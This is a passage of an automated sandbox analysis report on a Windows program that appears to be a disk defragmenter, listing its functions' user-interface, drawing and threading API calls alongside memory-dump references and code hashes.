                                                                                                                                                                                                                                                                                                • Opcode ID: f4e17d1d92922ba5e38ce16bca10ed58a203127cbb1472af428a1092aff2016b
                                                                                                                                                                                                                                                                                                • Instruction ID: 080451bb04fed4ed38a755b401fe0e9ad2b372c89e4fc55ac88ae6bf0dae2c00
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4e17d1d92922ba5e38ce16bca10ed58a203127cbb1472af428a1092aff2016b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84115EB5104745AFD724CF64C848B9B77E8FB84304F10893EE88A87690E7B9E588CB95
                                                                                                                                                                                                                                                                                                Function 0046CF70 Relevance: 7.6, APIs: 5, Instructions: 55windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 0046CF84
                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 0046CFAB
                                                                                                                                                                                                                                                                                                • PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 0046CFCB
                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 0046CFDA
                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 0046CFF1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ObjectSelect$Release
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3581861777-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 09afa59c7c7bf345e2bd9cfd905d74781f37247dddbab7f6bac84dc0e12143ed
                                                                                                                                                                                                                                                                                                • Instruction ID: daceeca4effa55fca9f5214fa6f3dce8251d9e38b51f783a69048b93fac7a53b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09afa59c7c7bf345e2bd9cfd905d74781f37247dddbab7f6bac84dc0e12143ed
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 751115B5200601AFC314DFA9C9C8C27B7EAFF88600700C62DB94987601DB35FC45CB64
                                                                                                                                                                                                                                                                                                Function 00416430 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00416443
                                                                                                                                                                                                                                                                                                • InflateRect.USER32(?,00000002,00000002), ref: 00416452
                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00416467
                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 0041647A
                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00478B80,000000FF,00416365), ref: 0041648D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Rect$Parent$InflateInvalidateWindow
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3567486610-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 2204eff79a0e70798fbd603735b2eda6009dd2241c77b76db33bd6b2d1834c9f
                                                                                                                                                                                                                                                                                                • Instruction ID: 59621ce25ffcf61443309c609473fb22192222cc28d28fc8a60ac4e9d60af83f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2204eff79a0e70798fbd603735b2eda6009dd2241c77b76db33bd6b2d1834c9f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9BF044B6100304BFC210EB74DC8AD6B77ACFBC8700F008A1DB58A87191EA74F540CB65
                                                                                                                                                                                                                                                                                                Function 00401220 Relevance: 7.5, APIs: 5, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(00497DC0,75FD5780,?,004658D6), ref: 0040122D
                                                                                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(00497DC0), ref: 00401243
                                                                                                                                                                                                                                                                                                • GdiplusShutdown.GDIPLUS(00000000), ref: 0040124F
                                                                                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00497DC0), ref: 00401263
                                                                                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00497DC0), ref: 0040126A
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CriticalSection$EnterLeave$GdiplusShutdown
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3506214061-0
                                                                                                                                                                                                                                                                                                • Opcode ID: b92e5560af5050c5c6993437e068edb64c42205fc1de9f9bdd2150818b8b9fdd
                                                                                                                                                                                                                                                                                                • Instruction ID: 085117cba8507ed758f2e3bd9e34728127d7a1f2de7180c4966a7f221b9c7101
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b92e5560af5050c5c6993437e068edb64c42205fc1de9f9bdd2150818b8b9fdd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16E0863166C2145ACA007BB6BC49B663F64AFC0B1471941BFE008B31E0C57855448FFD
                                                                                                                                                                                                                                                                                                Function 004288E0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 341threadCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00428B67
                                                                                                                                                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00428C3B
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 00428C8D
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseCreateHandleMultipleObjectsThreadWait
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 1263187225-2762138152
                                                                                                                                                                                                                                                                                                • Opcode ID: 2d7ebfa6a9a2b4656dd8fa51e96b61bd1dce91ce0a765f2429ab83b963c119d1
                                                                                                                                                                                                                                                                                                • Instruction ID: a913cb5e350b9d2bc9fc20d1f9b00526ce29f1f5c0cea8f0350da80d90f5eb0a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d7ebfa6a9a2b4656dd8fa51e96b61bd1dce91ce0a765f2429ab83b963c119d1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58D17F71706225DFC724EFA4E88462EB7B0BF44300F94896EF85597351DB75E880CBAA
                                                                                                                                                                                                                                                                                                Function 00422D50 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 178COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,1088D068,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00422F48
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CriticalEnterRedrawSectionWindow
                                                                                                                                                                                                                                                                                                • String ID: DiskChecked$DiskDefrag$`=
                                                                                                                                                                                                                                                                                                • API String ID: 142774367-3347577070
                                                                                                                                                                                                                                                                                                • Opcode ID: aeef45741bab38b063411b41e8f748650579216e3e116eb844468464c405ede7
                                                                                                                                                                                                                                                                                                • Instruction ID: fed9d3ca3bfe53db5501e1f63bebbc1333baccd255b2eb749adb8bf470123f53
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aeef45741bab38b063411b41e8f748650579216e3e116eb844468464c405ede7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E151A43170061AABC31CEF6CD995AA9F3A1BB84300F85862EED158B781D7B4B951DBC4
                                                                                                                                                                                                                                                                                                Function 00467820 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 173windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00467935
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 004679CE
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 004679E4
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$DeleteObject
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 4188969710-2762138152
                                                                                                                                                                                                                                                                                                • Opcode ID: 6ae490451279346f20ff5a9bdc53e8c576f5efa59d3a88cf8cb8055c59d1975e
                                                                                                                                                                                                                                                                                                • Instruction ID: 57d6ba00d9628d7bc6127d5ab1f70525051783d1f21ea283ef51d44a992bc025
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ae490451279346f20ff5a9bdc53e8c576f5efa59d3a88cf8cb8055c59d1975e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92612C70A08316DFD714EF64C884A1AB7A5BF84318F1088AEE955A7351E734EC45CFAB
                                                                                                                                                                                                                                                                                                Function 0040C4D0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 171COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: Back$GUBar::CDrawObjectFactory::CreateRectTextDraw$Text
                                                                                                                                                                                                                                                                                                • API String ID: 0-2901586747
                                                                                                                                                                                                                                                                                                • Opcode ID: b1efb13953a751cb5c03bbcbe7c56556e47a523d44cd9f1edb886f055ae568a6
                                                                                                                                                                                                                                                                                                • Instruction ID: 94c29d93b79a1152409cb834b352fc504edd985983e521adcc95b20eb26bf893
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1efb13953a751cb5c03bbcbe7c56556e47a523d44cd9f1edb886f055ae568a6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6514F75604315EFC710DF25C880A6BB7E8EB88754F104A2EF84997380E779ED458B9A
                                                                                                                                                                                                                                                                                                Function 00431060 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 150windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,?,00000000), ref: 004311B1
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004311C3
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • ColorIndex, xrefs: 00431185
                                                                                                                                                                                                                                                                                                • DiskDefrag\Setting Option\Gereral\DefragColor, xrefs: 0043118A
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
